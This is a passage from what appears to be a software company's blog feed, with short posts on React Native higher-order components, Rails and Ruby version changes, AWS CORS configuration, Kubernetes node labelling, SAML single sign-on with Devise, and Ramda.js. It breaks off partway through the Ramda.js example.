      <id>https://www.bigbinary.com/blog/higher-order-component-for-rendering-spinner-in-react-native-app</id>
       <content type="html"><![CDATA[<p>In one of our <a href="https://bigbinary.com/blog/using-recompose-to-build-higher-order-components">previous blogs</a>, we mentioned how <a href="https://github.com/acdlite/recompose">recompose</a> improves both the readability and the maintainability of the code.</p><p>We also saw how the <a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#branch">branch</a> and <a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendercomponent">renderComponent</a> functions from <code>recompose</code> help us in deciding which component to render based on a condition.</p><p>We can use the code from the <a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendercomponent">renderComponent documentation</a> to render a spinner component while the data is being fetched in a ReactJS application.</p><h2>Initial Code</h2><pre><code class="language-javascript">// PatientsList.js
import React, { Component } from 'react';
import { ScrollView } from 'react-native';
import LoadingIndicator from './LoadingIndicator';

export default class PatientsList extends Component {
  state = {
    isLoading: true,
    patientsList: [],
  }

  componentDidMount() {
    api.getPatientsList().then(responseData =&gt; {
      this.setState({
        patientsList: responseData,
        isLoading: false,
      })
    })
  }

  render() {
    const { isLoading } = this.state;
    if (isLoading) {
      return &lt;LoadingIndicator isLoading={isLoading} /&gt;
    } else {
      return (
        &lt;ScrollView&gt;
          {/* Some header component */}
          {/* View rendering the patients */}
        &lt;/ScrollView&gt;
      )
    }
  }
}</code></pre><p>In the above code, when the PatientsList component mounts, it fetches the list of patients from the API. During this time, the <code>isLoading</code> state is <code>true</code>, so we render the <code>LoadingIndicator</code> component.</p><p>Once the API call returns with the response, we set the <code>isLoading</code> state to <code>false</code>. This renders the <code>ScrollView</code> component with our list of patients.</p><p>The above code works fine, but if our app has multiple screens which show the loading indicator and fetch data, the above way of handling it becomes repetitive and hard to maintain.</p><h2>Building a higher order component</h2><p>Here's where Higher Order Components (HOC) are very useful. We can extract the logic for showing the loading indicator into a HOC.</p><pre><code class="language-javascript">// withSpinner.js
import React from &quot;react&quot;;
import LoadingIndicator from &quot;./LoadingIndicator&quot;;

const withSpinner = (Comp) =&gt; ({ isLoading, children, ...props }) =&gt; {
  if (isLoading) {
    return &lt;LoadingIndicator isLoading={isLoading} /&gt;;
  } else {
    return &lt;Comp {...props}&gt;{children}&lt;/Comp&gt;;
  }
};

export default withSpinner;</code></pre><p>Here, we created a HOC which accepts a component and the <code>isLoading</code> prop.</p><p>If <code>isLoading</code> is true, we show the <code>LoadingIndicator</code>. If <code>isLoading</code> is false, we show the supplied component with its children, and pass in the props.</p><p>Now, we can use the above HOC in our PatientsList.js file. The supplied component can be any React Native component based on the use case. Here in our case, it's a ScrollView.</p><pre><code class="language-javascript">// PatientsList.js
import React, { Component } from 'react';
import { ScrollView } from 'react-native';
import withSpinner from './withSpinner';

const ScrollViewWithSpinner = withSpinner(ScrollView);

export default class PatientsList extends Component {
  state = {
    isLoading: true,
    patientsList: [],
  }

  componentDidMount() {
    api.getPatientsList().then(responseData =&gt; {
      this.setState({
        patientsList: responseData,
        isLoading: false,
      })
    })
  }

  render() {
    const { isLoading } = this.state;
    return (
      &lt;ScrollViewWithSpinner
        isLoading={isLoading}
        // other props
      &gt;
        {/* Some header component */}
        {/* View rendering the patients */}
      &lt;/ScrollViewWithSpinner&gt;
    )
  }
}</code></pre><h2>Conclusion</h2><p>Because of the above extraction of logic into a HOC, we can now use the same HOC in all our components which render a loading indicator while data is being fetched.</p><p>The logic to show a loading indicator now resides in a HOC. This makes the code easier to maintain and less repetitive.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 doesn't load all records on calling Model.all#inspect]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/do-no-load-all-records-on-activerecord-relation-inspect"/>
      <updated>2017-11-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/do-no-load-all-records-on-activerecord-relation-inspect</id>
       <content type="html"><![CDATA[<p>Let's take a project with hundreds of users. When we call inspect on <code>User.all</code>, we see an array of 10 users followed by <code>...</code>. That means the output of the <code>#inspect</code> method shows data only for 10 records.</p><pre><code class="language-ruby">&gt; User.all.inspect
User Load (3.7ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot;
=&gt; &quot;#&lt;ActiveRecord::Relation [#&lt;User id: 1, email: \&quot;dirbee@example.com\&quot;&gt;,
#&lt;User id: 2, email: \&quot;tee@example.com\&quot;&gt;,
#&lt;User id: 3, email: \&quot;scott@example.com\&quot;&gt;,
#&lt;User id: 4, email: \&quot;mark@example.com\&quot;&gt;,
#&lt;User id: 5, email: \&quot;ben@example.com\&quot;&gt;,
#&lt;User id: 6, email: \&quot;tina@example.com\&quot;&gt;,
#&lt;User id: 7, email: \&quot;tyler@example.com\&quot;&gt;,
#&lt;User id: 8, email: \&quot;peter@example.com\&quot;&gt;,
#&lt;User id: 9, email: \&quot;rutul@example.com\&quot;&gt;,
#&lt;User id: 10, email: \&quot;michael@example.com\&quot;&gt;, ...]&gt;&quot;</code></pre><p>We can see that the query executed in the process fetches all the records, even though the output doesn't need all of them.</p><p>In Rails 5.1, <a href="https://github.com/rails/rails/pull/28592">only the needed records are loaded</a> when <code>inspect</code> is called on an ActiveRecord::Relation.</p><pre><code class="language-ruby">&gt; User.all.inspect
User Load (3.7ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; LIMIT $1 /*application:Ace Invoice*/  [[&quot;LIMIT&quot;, 11]]
=&gt; &quot;#&lt;ActiveRecord::Relation [#&lt;User id: 1, email: \&quot;dirbee@example.com\&quot;&gt;,
#&lt;User id: 2, email: \&quot;tee@example.com\&quot;&gt;,
#&lt;User id: 3, email: \&quot;scott@example.com\&quot;&gt;,
#&lt;User id: 4, email: \&quot;mark@example.com\&quot;&gt;,
#&lt;User id: 5, email: \&quot;ben@example.com\&quot;&gt;,
#&lt;User id: 6, email: \&quot;tina@example.com\&quot;&gt;,
#&lt;User id: 7, email: \&quot;tyler@example.com\&quot;&gt;,
#&lt;User id: 8, email: \&quot;peter@example.com\&quot;&gt;,
#&lt;User id: 9, email: \&quot;rutul@example.com\&quot;&gt;,
#&lt;User id: 10, email: \&quot;michael@example.com\&quot;&gt;, ...]&gt;&quot;</code></pre><p>We can see in the above case that the executed query has a LIMIT constraint, and hence only the required number of records is loaded.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Fixing CORS issue with AWS services]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/fixing-cors-issue-with-aws-services"/>
      <updated>2017-10-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/fixing-cors-issue-with-aws-services</id>
       <content type="html"><![CDATA[<p>While working on a client project, we started facing an issue where the JWPlayer stopped playing videos when we switched to the <a href="https://en.wikipedia.org/wiki/HTTP_Live_Streaming">HLS</a> version of the videos. We found a <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS">CORS</a> error in the JS console as shown below.</p><p><img src="/blog_images/2017/fixing-cors-issue-with-aws-services/cors_error.png" alt="cors error"></p><p>After researching, we found that JWPlayer makes an AJAX request to load the <a href="https://en.wikipedia.org/wiki/M3U#M3U8">m3u8</a> file. To fix the issue, we needed to enable CORS, and for that we needed to make changes to the S3 and Cloudfront configurations.</p><h2>S3 configuration changes</h2><p>We can configure CORS for the S3 bucket by allowing requests originating from specified hosts. As shown in the image below, we can find the CORS configuration option in the Permissions tab of the S3 bucket. <a href="http://docs.aws.amazon.com/AmazonS3/latest/dev/cors.html">Here</a> is the official documentation on configuring CORS for S3.</p><p><img src="/blog_images/2017/fixing-cors-issue-with-aws-services/s3_cors_configuration.png" alt="s3 cors configuration"></p><p>The S3 bucket will now allow requests originating from the specified hosts.</p><h2>Cloudfront configuration changes</h2><p><a href="http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/Introduction.html">Cloudfront</a> is a CDN service provided by AWS which uses edge locations to speed up the delivery of static content. Cloudfront takes content from S3 buckets, caches it at edge locations, and delivers it to the end user. For enabling CORS we need to configure Cloudfront to allow forwarding of the required headers.</p><p>We can configure the behavior of Cloudfront by clicking on the Cloudfront Distribution's &quot;Distribution Settings&quot;. Then from the &quot;Behaviour&quot; tab click on &quot;Edit&quot;. Here we need to whitelist the headers that should be forwarded. Select the &quot;Origin&quot; header to whitelist, which is required for CORS, as shown in the image below.</p><p><img src="/blog_images/2017/fixing-cors-issue-with-aws-services/cloudfront_behaviour.png" alt="cloudfront behaviour"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 allows rescue/else/ensure inside do/end blocks]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.5-allows-rescue-inside-do-end-blocks"/>
      <updated>2017-10-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.5-allows-rescue-inside-do-end-blocks</id>
       <content type="html"><![CDATA[<h4>Ruby 2.4</h4><pre><code class="language-ruby">irb&gt; array_from_user = [4, 2, 0, 1]
  =&gt; [4, 2, 0, 1]
irb&gt; array_from_user.each do |number|
irb&gt;   p 10 / number
irb&gt; rescue ZeroDivisionError =&gt; exception
irb&gt;   p exception
irb&gt;   next
irb&gt; end
SyntaxError: (irb):4: syntax error, unexpected keyword_rescue,
expecting keyword_end
rescue ZeroDivisionError =&gt; exception
      ^</code></pre><p>Ruby 2.4 throws an error when we try to use rescue/else/ensure inside do/end blocks.</p><h4>Ruby 2.5.0-preview1</h4><pre><code class="language-ruby">irb&gt; array_from_user = [4, 2, 0, 1]
  =&gt; [4, 2, 0, 1]
irb&gt; array_from_user.each do |number|
irb&gt;   p 10 / number
irb&gt; rescue ZeroDivisionError =&gt; exception
irb&gt;   p exception
irb&gt;   next
irb&gt; end
2
5
#&lt;ZeroDivisionError: divided by 0&gt;
10
 =&gt; [4, 2, 0, 1]</code></pre><p>Ruby 2.5 supports rescue/else/ensure inside do/end blocks.</p><p>Here are the relevant <a href="https://github.com/ruby/ruby/commit/0ec889d7ed">commit</a> and <a href="https://bugs.ruby-lang.org/issues/12906">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails adds accurate numerical validation]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-now-avoids-converting-integer-as-a-string-into-float-when-validating-numericality"/>
      <updated>2017-10-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-now-avoids-converting-integer-as-a-string-into-float-when-validating-numericality</id>
       <content type="html"><![CDATA[<p>Let's see an example of numericality validation with very large numbers.</p><pre><code class="language-ruby">class Score
  validates :total, numericality: { less_than_or_equal_to: 10_000_000_000_000_000 }
end

&gt; score = Score.new(total: (10_000_000_000_000_000 + 1).to_s)
&gt; score.total
#=&gt; 1.0e+16
&gt; score.invalid?
#=&gt; false</code></pre><p>Here, we have added a numericality validation on the <code>total</code> column of the <code>Score</code> model, requiring it to be less than or equal to <code>10_000_000_000_000_000</code>.</p><p>After that we have created one instance of this model with <code>total</code> greater than the allowed value. This should result in an invalid object, as it violates the numericality constraint.</p><p>But it is still valid. We can also see that the value of <code>total</code> has been converted into a floating point number instead of an integer. This happens because Rails used to <a href="https://github.com/rails/rails/blob/46bf9eea533f8a2fedbb0aaad12cae1c5a4b9612/activemodel/lib/active_model/validations/numericality.rb#L73">convert the input to float</a> <a href="https://github.com/rails/rails/blob/46bf9eea533f8a2fedbb0aaad12cae1c5a4b9612/activemodel/lib/active_model/validations/numericality.rb#L39">if it was not</a> already numeric.</p><p>The real problem here is that floating point comparison in Ruby itself is not accurate for very large numbers.</p><pre><code class="language-ruby">&gt;&gt; a = (10_000_000_000_000_000 + 1).to_s
=&gt; &quot;10000000000000001&quot;
&gt;&gt; b = Kernel.Float a
=&gt; 1.0e+16
&gt;&gt; c = b + 1
=&gt; 1.0e+16
&gt;&gt; c &lt; b
=&gt; false
&gt;&gt; c &gt; b
=&gt; false</code></pre><p>This issue has been fixed in Rails <a href="https://github.com/rails/rails/commit/b0be7792adf58e092b7f615ecbf3339ea70ee689">here</a>. Now, if the given string input can be treated as an integer, then <a href="https://github.com/rails/rails/blob/1ceaf7db5013a233bdc671b3f46583c4c1189fe1/activemodel/lib/active_model/validations/numericality.rb#L88">an integer value is returned instead of a float</a>. This makes sure that the comparison works correctly.</p><pre><code class="language-ruby"># Rails 5.2
&gt; score = Score.new(total: (10_000_000_000_000_000 + 1).to_s)
&gt; score.total
#=&gt; 10000000000000001
&gt; score.invalid?
#=&gt; true</code></pre><p>This change is present in Rails 5.2 and above. It has also been backported to the Rails 5.1 and Rails 5.0 branches.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 has removed top level constant lookup]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.5-has-removed-top-level-constant-lookup"/>
      <updated>2017-10-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.5-has-removed-top-level-constant-lookup</id>
       <content type="html"><![CDATA[<h4>Ruby 2.4</h4><pre><code class="language-ruby">irb&gt; class Project
irb&gt; end
=&gt; nil
irb&gt; class Category
irb&gt; end
=&gt; nil
irb&gt; Project::Category
(irb):5: warning: toplevel constant Category referenced by Project::Category
 =&gt; Category</code></pre><p>Ruby 2.4 returns the top level constant, with a warning, if it is unable to find a constant in the specified scope.</p><p>This does not work well in cases where we need constants with the same name defined both at the top level and inside another scope.</p><h4>Ruby 2.5.0-preview1</h4><pre><code class="language-ruby">irb&gt; class Project
irb&gt; end
=&gt; nil
irb&gt; class Category
irb&gt; end
=&gt; nil
irb&gt; Project::Category
NameError: uninitialized constant Project::Category
Did you mean?  Category
from (irb):5</code></pre><p>Ruby 2.5 throws an error if it is unable to find a constant in the specified scope.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/44a2576f79">commit</a> and <a href="https://bugs.ruby-lang.org/issues/11547">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Scheduling pods on nodes in Kubernetes using labels]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/scheduling-pods-on-nodes-in-kubernetes-using-labels"/>
      <updated>2017-10-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/scheduling-pods-on-nodes-in-kubernetes-using-labels</id>
      <content type="html"><![CDATA[<p>This post assumes that you have a basic understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>, <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a> and <a href="https://kubernetes.io/docs/concepts/architecture/nodes/">nodes</a>.</p><p>A Kubernetes cluster can have many nodes. Each node in turn can run multiple pods. By default Kubernetes manages which pod will run on which node, and this is something we do not need to worry about.</p><p>However sometimes we want to ensure that certain pods do not run on the same node. For example, we have an application called <em>wheel</em>. We have both staging and production versions of this app, and we want to ensure that the production pod and the staging pod are not on the same host.</p><p>To ensure that certain pods do not run on the same host we can use the <strong>nodeSelector</strong> constraint in the <strong>PodSpec</strong> to schedule pods on nodes.</p><h3>Kubernetes cluster</h3><p>We will use <a href="https://github.com/kubernetes/kops/">kops</a> to provision the cluster. We can check the health of the cluster using <code>kops validate cluster</code>.</p><pre><code class="language-bash">$ kops validate cluster
Using cluster from kubectl context: test-k8s.nodes-staging.com

Validating cluster test-k8s.nodes-staging.com

INSTANCE GROUPS
NAME              ROLE   MACHINETYPE MIN MAX SUBNETS
master-us-east-1a Master m4.large    1   1 us-east-1a
master-us-east-1b Master m4.large    1   1 us-east-1b
master-us-east-1c Master m4.large    1   1 us-east-1c
nodes-wheel-stg   Node   m4.large    2   5 us-east-1a,us-east-1b
nodes-wheel-prd   Node   m4.large    2   5 us-east-1a,us-east-1b

NODE STATUS
NAME                           ROLE   READY
ip-192-10-110-59.ec2.internal  master True
ip-192-10-120-103.ec2.internal node   True
ip-192-10-42-9.ec2.internal    master True
ip-192-10-73-191.ec2.internal  master True
ip-192-10-82-66.ec2.internal   node   True
ip-192-10-72-68.ec2.internal   node   True
ip-192-10-182-70.ec2.internal  node   True

Your cluster test-k8s.nodes-staging.com is ready</code></pre><p>Here we can see that there are two instance groups for nodes: <em>nodes-wheel-stg</em> and <em>nodes-wheel-prd</em>.</p><p><em>nodes-wheel-stg</em> might have application pods like <em>pod-wheel-stg-sidekiq</em>, <em>pod-wheel-stg-unicorn</em> and <em>pod-wheel-stg-redis</em>. Similarly <em>nodes-wheel-prd</em> might have application pods like <em>pod-wheel-prd-sidekiq</em>, <em>pod-wheel-prd-unicorn</em> and <em>pod-wheel-prd-redis</em>.</p><p>As we can see, the <strong>max number of nodes</strong> for the instance groups <em>nodes-wheel-stg</em> and <em>nodes-wheel-prd</em> is 5. It means that if new nodes are created in the future, then based on the instance group the newly created nodes will automatically be labelled and no manual work is required.</p><h3>Labelling a Node</h3><p>We will use <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/">Kubernetes labels</a> to label a node. To add a label we need to edit the instance group using kops.</p><pre><code class="language-bash">$ kops edit ig nodes-wheel-stg</code></pre><p>This will open up the instance group configuration file. We will add the following label in the instance group spec.</p><pre><code class="language-yaml">nodeLabels:
  type: wheel-stg</code></pre><p>The complete <code>ig</code> configuration looks like this.</p><pre><code class="language-yaml">apiVersion: kops/v1alpha2
kind: InstanceGroup
metadata:
  creationTimestamp: 2017-10-12T06:24:53Z
  labels:
    kops.k8s.io/cluster: k8s.nodes-staging.com
  name: nodes-wheel-stg
spec:
  image: kope.io/k8s-1.7-debian-jessie-amd64-hvm-ebs-2017-07-28
  machineType: m4.large
  maxSize: 5
  minSize: 2
  nodeLabels:
    type: wheel-stg
  role: Node
  subnets:
    - us-east-1a
    - us-east-1b
    - us-east-1c</code></pre><p>Similarly, we can label the instance group <em>nodes-wheel-prd</em> with the label <em>type: wheel-prd</em>.</p><p>After making the changes, update the cluster using <code>kops rolling-update cluster --yes --force</code>. This will update the cluster with the specified labels.</p><p>New nodes added in the future will have labels based on their respective instance groups.</p><p>Once nodes are labelled we can verify using <code>kubectl describe node</code>.</p><pre><code class="language-bash">$ kubectl describe node ip-192-10-82-66.ec2.internal
Name:               ip-192-10-82-66.ec2.internal
Roles:              node
Labels:             beta.kubernetes.io/arch=amd64
                    beta.kubernetes.io/instance-type=m4.large
                    beta.kubernetes.io/os=linux
                    failure-domain.beta.kubernetes.io/region=us-east-1
                    failure-domain.beta.kubernetes.io/zone=us-east-1a
                    kubernetes.io/hostname=ip-192-10-82-66.ec2.internal
                    kubernetes.io/role=node
                    type=wheel-stg</code></pre><p>In this way we have our node labelled using kops.</p><h3>Labelling nodes using kubectl</h3><p>We can also label a node using <code>kubectl</code>.</p><pre><code class="language-bash">$ kubectl label node ip-192-20-44-136.ec2.internal type=wheel-stg</code></pre><p>After labelling a node, we will add a <code>nodeSelector</code> field to the <code>PodSpec</code> in our deployment template.</p><p>We will add the following block in the deployment manifest.</p><pre><code class="language-yaml">nodeSelector:
  type: wheel-stg</code></pre><p>We can add this configuration in the original deployment manifest.</p><pre><code class="language-yaml">apiVersion: v1
kind: Deployment
metadata:
  name: test-staging-node
  labels:
    app: test-staging
  namespace: test
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: test-staging
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-staging
        imagePullPolicy: Always
        env:
        - name: REDIS_HOST
          value: test-staging-redis
        - name: APP_ENV
          value: staging
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
      nodeSelector:
        type: wheel-stg
      imagePullSecrets:
        - name: registrykey</code></pre><p>Let's launch this deployment and check where the pod is scheduled.</p><pre><code class="language-bash">$ kubectl apply -f test-deployment.yml
deployment &quot;test-staging-node&quot; created</code></pre><p>We can verify that our pod is running on a node with label <code>type=wheel-stg</code>.</p><pre><code class="language-bash">$ kubectl describe pod test-staging-2751555626-9sd4m
Name:           test-staging-2751555626-9sd4m
Namespace:      default
Node:           ip-192-10-82-66.ec2.internal/192.10.82.66
...
...
Conditions:
  Type           Status
  Initialized    True
  Ready          True
  PodScheduled   True
QoS Class:       Burstable
Node-Selectors:  type=wheel-stg
Tolerations:     node.alpha.kubernetes.io/notReady:NoExecute for 300s
                 node.alpha.kubernetes.io/unreachable:NoExecute for 300s
Events:          &lt;none&gt;</code></pre><p>Similarly we run <em>nodes-wheel-prd</em> pods on nodes labelled with <code>type: wheel-prd</code>.</p><p>Please note that when we specify a <code>nodeSelector</code> and no node matches the label, the pods stay in the <code>pending</code> state as they don't find a node with a matching label.</p><p>In this way we schedule our pods to run on specific nodes for certain use-cases.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Integrate SAML with many IDPs with Devise & OmniAuth]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/saml-integration-with-multiple-idps-using-devise-omniauth"/>
      <updated>2017-10-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/saml-integration-with-multiple-idps-using-devise-omniauth</id>
      <content type="html"><![CDATA[<p>Recently, we integrated our SAML service provider (SP) with multiple identity providers (IDPs) to facilitate Single Sign-On (SSO) using Devise with OmniAuth.</p><p>Before we jump into the specifics, here is the SAML definition from <a href="https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language">Wikipedia</a>.</p><blockquote><p>Security Assertion Markup Language (SAML, pronounced sam-el) is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider (IDP) and a service provider (SP).</p></blockquote><p>The choice of <a href="https://github.com/plataformatec/devise">Devise</a> with <a href="https://github.com/omniauth/omniauth-saml">OmniAuth-SAML</a> to build SAML SSO capabilities was natural to us, as we already had a dependency on Devise, and OmniAuth integrates nicely with Devise.</p><p><a href="https://github.com/plataformatec/devise/wiki/OmniAuth:-Overview">Here</a> is the official overview on how to integrate OmniAuth with Devise.</p><p>After following the overview, this is how our <code>config</code> and <code>user.rb</code> looked.</p><pre><code class="language-ruby"># config file
Devise.setup do |config|
  config.omniauth :saml,
    idp_cert_fingerprint: 'fingerprint',
    idp_sso_target_url: 'target_url'
end

# user.rb file
devise :omniauthable, :omniauth_providers =&gt; [:saml]</code></pre><p>The problem with the above configuration is that it supports only one SAML IDP.</p><p>To support multiple IDPs, we re-defined the files as below.</p><pre><code class="language-ruby"># config file
Devise.setup do |config|
  config.omniauth :saml_idp1,
    idp_cert_fingerprint: 'fingerprint-1',
    idp_sso_target_url: 'target_url-1',
    strategy_class: ::OmniAuth::Strategies::SAML,
    name: :saml_idp1

  config.omniauth :saml_idp2,
    idp_cert_fingerprint: 'fingerprint-2',
    idp_sso_target_url: 'target_url-2',
    strategy_class: ::OmniAuth::Strategies::SAML,
    name: :saml_idp2
end

# user.rb file
devise :omniauthable, :omniauth_providers =&gt; [:saml_idp1, :saml_idp2]</code></pre><p>Let's go through the changes one by one.</p><p><strong>1. Custom providers:</strong> Instead of using the standard provider <code>saml</code>, we configured custom providers (<code>saml_idp1</code>, <code>saml_idp2</code>) in the first line of the configuration as well as in <code>user.rb</code>.</p><p><strong>2. Strategy class:</strong> In the case of the standard provider (<code>saml</code>), Devise can figure out the <code>strategy_class</code> on its own. For custom providers, we need to specify it explicitly.</p><p><strong>3. OmniAuth unique identifier:</strong> After making the above two changes, everything worked fine except the OmniAuth URLs. For some reason, OmniAuth was still listening on the <code>saml</code> scoped path instead of the new provider names <code>saml_idp1</code> and <code>saml_idp2</code>.</p><pre><code class="language-ruby"># Actual metadata path used by OmniAuth
/users/auth/saml/metadata

# Expected metadata paths
/users/auth/saml_idp1/metadata
/users/auth/saml_idp2/metadata</code></pre><p>After digging into the <code>Devise</code> and <code>OmniAuth</code> code bases, we <a href="https://github.com/omniauth/omniauth/blob/6cce8181b45da49cecb9c0af139cfc62b3b1a25e/lib/omniauth/strategy.rb#L139">discovered</a> the provider <code>name</code> configuration. In the absence of this configuration, OmniAuth falls back to the strategy class name to build the path. We could not find any code in Devise which defined <code>name</code> for OmniAuth, which explained the <code>saml</code> scoped path (we were expecting Devise to pass <code>name</code>, assigning it the same value as <code>provider</code>).</p><p>After adding the <code>name</code> configuration, OmniAuth started listening on the correct URLs.</p><p><strong>4. Callback actions:</strong> Lastly, we added both actions in <code>OmniauthCallbacksController</code>:</p><pre><code class="language-ruby">class Users::OmniauthCallbacksController &lt; Devise::OmniauthCallbacksController
  def saml_idp1
    # Implementation
  end

  def saml_idp2
    # Implementation
  end

  # ...
  # Rest of the actions
end</code></pre><p>With these changes, along with the official guide mentioned above, our SP was able to authenticate users from multiple IDPs.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 expiry option for signed & encrypted cookies]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/expirty-option-for-signed-and-encrypted-cookies-in-Rails-5-2"/>
      <updated>2017-10-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/expirty-option-for-signed-and-encrypted-cookies-in-Rails-5-2</id>
      <content type="html"><![CDATA[<p>In Rails 5.1 we have an option to set expiry for cookies.</p><pre><code class="language-ruby">cookies[:username] = { value: &quot;sam_smith&quot;, expires: Time.now + 4.hours }</code></pre><p>The above code sets a cookie which expires in 4 hours.</p><p>The <code>expires</code> option is not supported for <a href="https://blog.bigbinary.com/2013/03/19/cookies-on-rails.html">signed and encrypted cookies</a>. In other words, we are not able to decide on the server side when an encrypted or signed cookie will expire.</p><p>From Rails 5.2, we'll be able to <a href="https://github.com/rails/rails/pull/30121">set expiry for encrypted and signed cookies</a> as well.</p><pre><code class="language-ruby">cookies.encrypted[:firstname] = { value: &quot;Sam&quot;, expires: Time.now + 1.day }
# sets string `Sam` in an encrypted `firstname` cookie for 1 day.

cookies.signed[:lastname] = { value: &quot;Smith&quot;, expires: Time.now + 1.hour }
# sets string `Smith` in a signed `lastname` cookie for 1 hour.</code></pre><p>Apart from this, in Rails 5.1 we needed to provide an absolute date/time value for the <code>expires</code> option.</p><pre><code class="language-ruby"># setting cookie for 90 minutes from current time.
cookies[:username] = { value: &quot;Sam&quot;, expires: Time.now + 90.minutes }</code></pre><p>Starting with Rails 5.2, we'll be able to set the <code>expires</code> option by giving a relative duration as the value.</p><pre><code class="language-ruby"># setting cookie for 90 minutes from current time.
cookies[:username] = { value: &quot;Sam&quot;, expires: 90.minutes }

# After 1 hour
&gt; cookies[:username]
#=&gt; &quot;Sam&quot;

# After 2 hours
&gt; cookies[:username]
#=&gt; nil</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Optimize JavaScript code for composability with Ramda.js]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/optimize-javascript-code-for-composability-with-ramdajs"/>
      <updated>2017-10-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/optimize-javascript-code-for-composability-with-ramdajs</id>
      <content type="html"><![CDATA[<p>In this blog <code>R</code> stands for <a href="http://ramdajs.com/">Ramda.js</a>. More on this later.</p><p>Here is code without R.</p><pre><code class="language-javascript">function isUnique(element, selector) {
  const parent = element.parentNode;
  const elements = parent.querySelectorAll(selector);
  return elements.length === 1 &amp;&amp; elements[0] === element;
}</code></pre><p>Code with R.</p><pre><code class="language-javascript">function isUnique(element, selector) {
  const querySelectorAll = R.invoker(1, 'querySelectorAll')(selector);
  return R.pipe(
    R.prop('parentNode'),
    querySelectorAll,
    elements =&gt; R.both(
                  R.equals(R.length(elements), 1),
                  R.equals(elements[0], element)
                )
  )(element);
}</code></pre><p>Is the refactored code better?</p><p>What is R? What's invoker? What's pipe?</p><p>The &quot;code without R&quot; reads fine and even a person who has just started learning JavaScript can understand it. Then why take on all this extra complexity? Shouldn't we be writing code that is easier to understand?</p><p>Good questions. Who could be against writing code that is easier to understand?</p><p>If all I'm writing is a function called <code>isUnique</code> then of course the &quot;before version&quot; is simpler. However this function is part of a bigger piece of software with thousands of lines of code.</p><p>A big piece of software is nothing but a collection of smaller pieces of code. We compose code together to make the software work.</p><p>We need to optimize for composability, and as we write code that is more composable, we are finding that composable code is also easier to read.</p><p>At BigBinary we have been experimenting with composability. We previously <a href="https://blog.bigbinary.com/2017/09/12/using-recompose-to-build-higher-order-components.html">wrote a blog</a> on how using <a href="https://github.com/acdlite/recompose">Recompose</a> is making our React components more composable.</p><p>Now we are trying the same techniques at the pure JavaScript level using Ramda.js.</p><p>Let's take a look at another example.</p><h3>Example 2</h3><p>We have a list of users with name and status.</p><pre><code class="language-javascript">var users = [
  { name: &quot;John&quot;, status: &quot;Active&quot; },
  { name: &quot;Mike&quot;, status: &quot;Inactive&quot; },
  { name: &quot;Rachel&quot;, status: &quot;Active&quot; },
];</code></pre><p>We need to find all active users. Here is a version without R.</p><p><a href="https://jsfiddle.net/neerajsingh0101/wuLc4gqL/5">jsfiddle</a></p><pre><code class="language-javascript">var activeUsers = function (users) {
  return users.filter(function (user) {
    var status = user.status;
    return status === &quot;Active&quot;;
  });
};</code></pre><p>Here is code with R.</p><p><a href="https://jsfiddle.net/neerajdotname/9gvsf92g/7/">jsfiddle</a></p><pre><code class="language-javascript">var isStatusActive = R.propSatisfies(R.equals(&quot;Active&quot;), &quot;status&quot;);
var active = R.filter(isStatusActive);
var result = active(users);</code></pre><p>Now let's say that the user data changes and we have a user with an empty name. We don't want to include such users. Now the data looks like this.</p><pre><code class="language-javascript">var users = [
  { name: &quot;John&quot;, status: &quot;Active&quot; },
  { name: &quot;Mike&quot;, status: &quot;Inactive&quot; },
  { name: &quot;Rachel&quot;, status: &quot;Active&quot; },
  { name: &quot;&quot;, status: &quot;Active&quot; },
